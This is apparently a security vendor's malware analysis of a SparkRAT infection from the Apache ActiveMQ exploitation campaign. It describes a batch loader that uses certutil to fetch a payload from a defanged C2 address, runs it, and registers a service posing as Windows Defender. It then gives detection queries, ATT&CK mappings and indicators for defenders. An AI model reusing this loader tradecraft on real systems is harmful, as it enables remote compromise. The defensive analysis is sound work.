Introduction
SparkRAT is an open source, cross platform remote access tool (RAT) written in Golang[1]. SparkRAT has been employed by various threat actor groups including Winnti[2] and DragonSpark[3]. Most recently, SparkRAT was identified as a core component of a post-exploitation activity associated with HelloKitty/TellYouThePass ransomware attacks involving the exploitation of CVE-2023-46604, a vulnerability in Apache ActiveMQ software[4]. SparkRAT clients are configurable and feature rich supporting remote file operations, endpoint enumeration, screenshots, and a remote terminal.
In this article we will analyze a SparkRAT sample associated with the previously reported Apache ActiveMQ exploitation to demonstrate how FortiEDR is able to effectively detect and mitigate its operation. Included at the end of the article are threat hunting queries that can be used to support proactive hunt activities for this behavior, MITRE ATT&CK mappings showing observables for each technique employed within the analyzed SparkRAT sample and IOCs related to this SparkRAT campaign.
Figure 1. Attack flow diagram depicting the infection process for analyzed SparkRAT sample.
Analysis
The sample analyzed in this article starts with the execution of a batch script (.bat file) located in the ‘C:\users\public’ directory. In the campaign targeting Apache ActiveMQ, this batch file would have been executed through exploitation of the vulnerable web application resulting in a process creation for a cmd.exe process referencing the batch file. In the case of our testing this batch file was started from a PowerShell process and the batch file was names ‘win.bat’.
Analyzing the contents of the batch file we can see that a series of commands are entered to download a file from an external URL, execute the downloaded file, establish persistence by registering a new service referencing the downloaded file and then delete the batch file itself. This can be seen in the screenshot in Figure 2.
Figure 2. Contents of win.bat used to launch SparkRAT infection.
The certutil command contained within the batch file attempts to download a file at the URL ‘http://45.32.120[.]181/x86.exe’ and save as ‘c:\users\public\86.dat’. This is an example of certutil being used for T1105: Ingress Tool Transfer[5] and is a well-documented method of using LOLbins to attempt to evade detection. This behavior is anomalous and is detected and blocked by FortiEDR as it triggers the ‘Suspicious Application – Connection Attempt from a Suspicious Application’ rule in the Exfiltration Prevention policy. An example of the FortiEDR security event generated by this behavior is shown below in Figure 3.
Figure 3. FortiEDR security event generated as a result of the suspicious certutil behavior triggered by execution of the SparkRAT loader batch script.
If this certutil process is able to be successfully executed a file will be created and dropped at ‘c:\users\public\86.dat’ by the certutil process. FortiEDR threat hunting telemetry can give additional context to these security events. If executed successfully this behaviour will result in a Process Creation event for the certutil process, a HTTP Request event related to the external URL and the certutil process, and a File Creation event for the creation of the resulting downloaded file. A screenshot of the HTTP Request event is shown below in Figure 4.
Figure 4. FortiEDR Threat Hunting threat hunting data showing the HTTP Request event created as the certutil process attempts to download payload from malicious URL.
Once the ‘86.dat’ file has been downloaded through certutil, it is executed by the batch file. FortiEDR identifies the binary file as anomalous and send the file for Sandbox analysis. Given the unknown nature of the file this execution would be blocked by FortiEDR unless sandbox analysis identified it as a likely legitimate false positive. Sandbox analysis determined the downloaded payload was malicious and identified it as a likely SparkRAT executable as shown in the security event shown in Figure 5 below.
Figure 5. FortiEDR security event related to the attempted execution of the downloaded ‘86.dat’ file (SparkRAT executable).
Once executed the SparkRAT implant will begin to attempt to contact its C2 via web requests. FortiEDR detects and blocks this behavior as the network connection event is associated with an instance of a process linked to a malicious file. The associated security event is shown below in Figure 6.
Figure 6. FortiEDR security event associated with SparkRAT process attempting to contact it’s C2 following execution.
We can also see each of the attempts to contact the C2 in FortiEDR threat hunting data by searching for network connections established by the SparkRAT process (86.dat). An example of some of the telemetry generated during the testing of our sample is shown below in Figure 7.
Figure 7. FortiEDR Threat Hunting telemetry includes Socket Connect events related to the SparkRAT process attempting to connect to its C2.
The IP of the C2 connection attempts, ’45.32.120[.]181’ matches with the IP in the URL accessed by the initial certutil process to retrieve the SparkRAT payload. Using Fortinet’s Central Threat System (CTS) we can see that this IP and the associated URL are both known indicators for recent SparkRAT campaigns. Relevant information form CTS on this IP is shown below in Figure 8.
Figure 8. Fortinet CTS data on identified SparkRAT C2. Note the association with both installation and C2.
The next stage of the batch file execution establishes persistence for the SparkRAT executable by registering a new service called ‘windowDefenSrv’ which on execution will execute the ‘86.dat’ executable. FortiEDR threat hunting telemetry can be used to identify this behavior as a Process Creation event is generated in response to the creation of the sc.exe process. This telemetry can be observed in Figure 9 below.
Figure 9. FortiEDR threat hunting telemetry related to the creation of a new service used for SparkRAT persistence.
Conclusion
FortiEDR is able to detect and mitigate execution and subsequent behavior associated with the operation of SparkRAT as well as the deployment mechanism (.bat file) employed as part of the analyzed campaign. Whilst SparkRAT is a configurable RAT, the behavioral detections demonstrated in this article will continue to be effective at mitigating its operation even with currently available configuration changes. In addition to the detection and protections offered by FortiEDR’s security policies, threat hunting telemetry can also be used to add additional context to a SparkRAT intrusion. Some threat hunting queries based on available threat hunting telemetry have been included below that can support threat hunting activities related to SparkRAT execution and operation. IOCs and MITRE ATT&CK observables are also included to support defensive activities.
Threat Hunting
The following section provided some threat hunting queries that can be used to parse FortiEDR threat hunting telemetry and identify potential events of interest that may be related to the execution of the SparkRAT sample analyzed in this article. Many of these threat hunting queries are generic and will detect the techniques employed by SparkRAT but may also identify other suspicious behavior. It is recommended that organizations who have FortiEDR load in queries as scheduled queries to add additional context to security events that occur within their environment and to create detection overlap in case exception prevent expected security events form being generated. Queries should be tuned before deploying in production.
The following threat hunting query can be used to retrieve HTTP Request events associated with the certutil process that contain the ‘-urlcache’ commandline argument. These events could represent a method of ingress tool transfer using the default certutil command. False positives are possible where certutil functionality is being used to download remote certificates, however this can be easily tuned once benign activity is observed in an organizations environment.
Type:"HTTP Request" AND Source.Process.Name:"certutil.exe" AND Source.Process.CommandLine:"-urlcache"
The following threat hunting query can be used to retrieve Process Creation events where the process executable is located in the default public user directory. This directory is a common place for malware to be staged for execution like the sample analyzed in this article. False positives are rare.
Type:"Process Creation" AND Target.Process.File.Path:"\\Users\\Public"
The following threat hunting query can be used to retrieve Process Creation events where the process executable is a ‘.dat’ file. This is non-standard and will detect execution of the main executable analyzed in this article.
Type:"Process Creation" AND Target.Process.File.Path:"*.dat"
The following threat hunting query will detect HTTP requests to known SparkRAT C2 and Socket Connect events known SparkRAT C2. Note that both sets of atomic indicators in these queries are taken from the sample analyzed in this article and do not represent all atomic indicators associated with other SparkRAT campaigns. Organizations may consider adding in additional indicators using this query as a template.
(Type:"Socket Connect" AND RemoteIP:"45.32.120.181") OR (Type:"HTTP Request" AND URL: "http\:\/\/45.32.120.181\/*")
The following threat hunting query will return Process Creation events for the sc.exe process where ‘C:\Users\Public’ (case insensitive) is referenced in the command line arguments. It is anomalous for a service to be registered inside the public directory and this is a common staging area for malware.
Type:"Process Creation" AND Target.Process.Name:"sc.exe" AND Target.Process.CommandLine:"c\:\\Users\\Public"
MITRE ATT&CK Mapping
Initial Access
|
Technique ID |
Technique Description |
Observed Activity |
|
Exploit Public Facing Application |
Initial exploitation and delivery of post-exploitation payload is through web requests targeting Apache ActiveMQ vulnerability CVE-2023-46604. |
Execution
|
Technique ID |
Technique Description |
Observed Activity |
|
Command and Scripting Interpreter – Windows Command Shell |
Cmd.exe child process spawns on execution of SparkRAT payload also batch file is used for initial execution. |
Persistence
|
Technique ID |
Technique Description |
Observed Activity |
|
Create or Modify System Process – Windows Service |
Batch file (win.bat) creates a service using sc.exe with the ‘autostart’ feature enabled to launch SparkRAT executable (86.dat). Service name is ‘windowDefenSvr’. This is likely for persistence as the downloaded payload has already been executed earlier in the batch file. |
Defense Evasion
|
Technique ID |
Technique Description |
Observed Activity |
|
Masquerading – Masquerade Task or Service |
The service name used for persistence is ‘windowDefenSrv’ likely an attempt to masquerade as a Windows Defender support service. |
|
Technique ID |
Technique Description |
Observed Activity |
|
Indicator Removal – File Deletion |
The batch file used for initial installation and execution of SparkRAT is deleted following its completed execution. Likely to hide evidence of the activity it performed. |
Discovery
|
Technique ID |
Technique Description |
Observed Activity |
|
System Information Discovery |
On execution the SparkRAT executable launches a cmd.exe process and performs the ‘ver’ command, likely to get a better understanding of the environment it is operating in and the required dependencies. |
Command and Control
|
Technique ID |
Technique Description |
Observed Activity |
|
Application Layer Protocol – Web Protocols |
The initial batch script used for this infection uses web requests from the certutil utility to download the main SparkRAT payload. Web traffic is on port 8000 for the C2 server. |
|
Technique ID |
Technique Description |
Observed Activity |
|
Non-Standard Port |
Installation web requests are sent on port 8000 in the case of this analyzed sample. C2 requests sent to port 81. Note that SparkRAT is a configurable tool so this may change between campaigns. |
|
Technique ID |
Technique Description |
Observed Activity |
|
Ingress Tool Transfer |
Proxy download through certutil using the ‘-urlcache’ and ‘-split’ arguments. Downloadd file (86.dat) was written to the ‘C:\Users\Public’ directory and maintained for persistence following initial execution. |
IOCs
The following IOCs are related to the SparkRAT sample analyzed in this article. Note that SparkRAT is an open source tool employed by various actors so atomic indicators like this represent a very small subset of IOCs related to global malicious SparkRAT activity.
|
Indicator Description |
Indicator |
Indicator Type |
Associated Tactic |
Notes |
First Observed |
|
Malicious Script |
FAC45F5210A2AA9A55EFB31CBADB4CF5890F729E |
SHA1 Hash |
Installation |
‘win.bat’, batch file used to download and execute SparkRAT executable |
2023-10-10 |
|
Malicious Script |
89B8ACD3154735754120E3E4E62C0ACE66920886725015CCDFC72FF580AF5D21 |
SHA256 Hash |
Installation |
‘win.bat’, batch file used to download and execute SparkRAT executable |
2023-10-10 |
|
Malicious Executable |
6E6CC959342A1A0195140C4A829744898ED82097 |
SHA1 Hash |
C2 |
‘86.dat’, SparkRAT executable |
2023-10-10 |
|
Malicious Executable |
D065D44D0412AEF867F66626B5C4A3D7D0A3BDB59C61712B0C71EFBF9865A7A6 |
SHA256 Hash |
C2 |
‘86.dat’, SparkRAT executable |
2023-10-10 |
|
Malicious URL |
URL |
Installation |
C2 hosting SparkRAT executable, pulled by certutil |
2023-10-10 |
|
|
Malicious IP |
45.32.120[.]181 |
IP |
C2 |
C2 contacted by SparkRAT executable |
2023-10-10 |
[1] https://github.com/XZB-1248/Spark
[2] https://blog.exatrack.com/melofee/
[3] https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source...
[4] https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ranso...
